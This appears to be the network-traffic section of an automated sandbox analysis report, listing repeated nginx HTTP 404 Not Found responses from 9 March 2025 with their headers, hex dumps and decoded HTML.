    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:55:24 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:55:27 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:55:53 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:55:57 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:55:59 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:56:02 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:56:29 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:56:32 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:56:35 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
